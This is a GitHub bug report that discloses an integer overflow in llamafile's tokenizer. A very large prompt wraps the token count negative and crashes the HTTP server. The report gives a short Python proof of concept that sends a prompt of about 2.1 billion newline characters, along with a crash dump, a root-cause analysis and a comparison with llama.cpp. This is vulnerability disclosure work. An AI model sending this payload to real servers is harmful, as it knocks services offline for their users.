Skip to content

Bug: Integer overflow in llamafile leads to arbitrary DoS in llamafile #835

@ylwango613

Description

@ylwango613

Contact Details

[email protected]

What happened?

Launching llamafile with any GGUF file:

./llamafile --host 0.0.0.0 -m /data/ylwang/Projects/llamafile/test++/0.gguf

Proof of Concept (PoC)

Open another terminal and run:

python3 3.py

where 3.py contains:

import requests

resp = requests.post(
    "http://127.0.0.1:8080/completion",
    json={
        "prompt": "\n" * 2147483648,
        "n_predict": 20
    }
)

print(resp.json())

After a short period, llamafile terminates with:

>>> libc++abi: terminating due to uncaught exception of type std::length_error: vector
error: Uncaught SIGABRT (SI_TKILL) at 0x3f10017a4c2 on XXF-GPU-03 pid 1549506 tid 1549508
  ./llamafile
  No error information
  Linux Cosmopolitan 3.9.7 MODE=x86_64; #150-Ubuntu SMP Sat Apr 12 06:00:09 UTC 2025 XXF-GPU-03 5.15.0-140-generic

RAX 0000000000000000 RBX 0000000000000006 RDI 000000000017a4c4
RCX 00000000009ae101 RDX 0000000000000000 RSI 0000000000000006
RBP 00007fcda6d890c0 RSP 00007fcda6d890c0 RIP 00000000009ae101
 R8 0000000000000000  R9 0000000000000000 R10 00000000009ae101
R11 0000000000000296 R12 0000000000b6b4e8 R13 00000000009c3000
R14 0000000000b6b4d0 R15 00007fcda6d893c0
TLS 00007fcda7bebd00

XMM0  00000000000000000000000000000000 XMM8  00000000000000000000000035800000
XMM1  00000000000000000000000000000000 XMM9  755f6e66662e64252e6b6c622e636e65
XMM2  000000000000000000007fcda6d881e0 XMM10 00000000000000000000000000000000
XMM3  726573753e7c74726174735f6d697c3c XMM11 00000000000000000000000000000000
XMM4  000000000000705f6c61636970797412 XMM12 00000000000000000000000000000000
XMM5  00000000000000000000000000000000 XMM13 00000000000000000000000000000000
XMM6  00007a5f7366740a00007fcda6d89530 XMM14 00000000000000000000000000000000
XMM7  00007fcda6d898f000006b5f706f740a XMM15 00000000000000000000000000000000

cosmoaddr2line /data/ylwang/Projects/llamafile/out/bin/llamafile 9ae101 99700b 4078c5 9c2eaa 9c2fae 96f126 96ed52 428bf1 429fdb 458120 4a4c63 574f46 574efb 48599e 47f2a4 44c1af 44337d 521db5 97a384 98c884 9fc9c7

0x00000000009ae101: ?? ??:0
0x000000000099700b: ?? ??:0
0x00000000004078c5: ?? ??:0
0x00000000009c2eaa: ?? ??:0
0x00000000009c2fae: ?? ??:0
0x000000000096f126: ?? ??:0
0x000000000096ed52: ?? ??:0
0x0000000000428bf1: ?? ??:0
0x0000000000429fdb: ?? ??:0
0x0000000000458120: ?? ??:0
0x00000000004a4c63: ?? ??:0
0x0000000000574f46: ?? ??:0
0x0000000000574efb: ?? ??:0
0x000000000048599e: ?? ??:0
0x000000000047f2a4: ?? ??:0
0x000000000044c1af: ?? ??:0
0x000000000044337d: ?? ??:0
0x0000000000521db5: ?? ??:0
0x000000000097a384: ?? ??:0
0x000000000098c884: ?? ??:0
0x00000000009fc9c7: ?? ??:0

000000400000-000000b851e0 r-x-- 7700kb
000000b86000-000003306000 rw--- 40mb
0006fe000000-0006fe001000 rw-pa 4096b
7fc927f05000-7fcb9b305000 rw-pa 10gb
7fcbec905000-7fcc6cb05000 rw-pa 2050mb
7fcd0cd05000-7fcd8efe1fc0 rw-pa 2083mb
7fcd8efe2000-7fcd8f212fc0 rw-pa 2244kb
7fcd8f213000-7fcd8f42ffc0 rw-pa 2164kb
7fcd8f430000-7fcd8f660fc0 rw-pa 2244kb
7fcd8f661000-7fcd90757fc0 rw-pa 17mb
7fcd90758000-7fcd90758fc0 rw-pa 4032b
7fcd90759000-7fcd90759fc0 rw-pa 4032b
7fcd9075a000-7fcd9075afc0 rw-pa 4032b
7fcd9075b000-7fcd9076ffc0 rw-pa 84kb
7fcd90770000-7fcd90770fc0 rw-pa 4032b
# 15'345'442'816 bytes in 26 mappings
./llamafile --host 0.0.0.0 -m /data/ylwang/Projects/llamafile/test++/0.gguf 

The crash log shows a fatal abort caused by std::length_error while constructing a std::vector.

Root Cause

In ./llama.cpp/common.cpp:2667, the function llama_tokenize calculates the token buffer size as:

int n_tokens = text.length() + 2 * add_special;
std::vector<llama_token> result(n_tokens);

text.length() returns a size_t (64-bit unsigned).
When the user provides an extremely large input (e.g., a prompt of 2,147,483,648 characters), text.length() exceeds the maximum representable value of a 32-bit signed integer. This value is then assigned to int n_tokens, causing an integer overflow, which wraps the result into a negative value.

Printing the value confirms:

n_tokens = -2147483648

This negative size is then passed to the std::vector constructor, resulting in an immediate std::length_error and an uncontrolled termination of the llamafile process.

Impact

A remote attacker who can send requests to the HTTP server can trigger the integer overflow by supplying an extremely large prompt, causing llamafile to abort. This leads to a fully remote, unauthenticated Denial-of-Service condition.

In llama.cpp

In contrast, the standalone llama.cpp binary does enforce a limit on vector size. Running the same request against a model launched directly via llama.cpp:

import requests

resp = requests.post(
    "http://127.0.0.1:8080/v1/chat/completions",
    json={
        "messages": [
            {"role": "user", "content": "\n" * 2147483648}
        ],
        "max_tokens": 20
    }
)

print(resp.text)

produces a controlled error:

{"error":{"code":500,"message":"cannot create std::vector larger than max_size()","type":"server_error"}}

This demonstrates that llama.cpp itself performs internal bounds checks.

Version

llamafile v0.9.3

What operating system are you seeing the problem on?

Linux

Relevant log output

Please see the ``what happened``.

Metadata

Metadata

Assignees

No one assigned

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions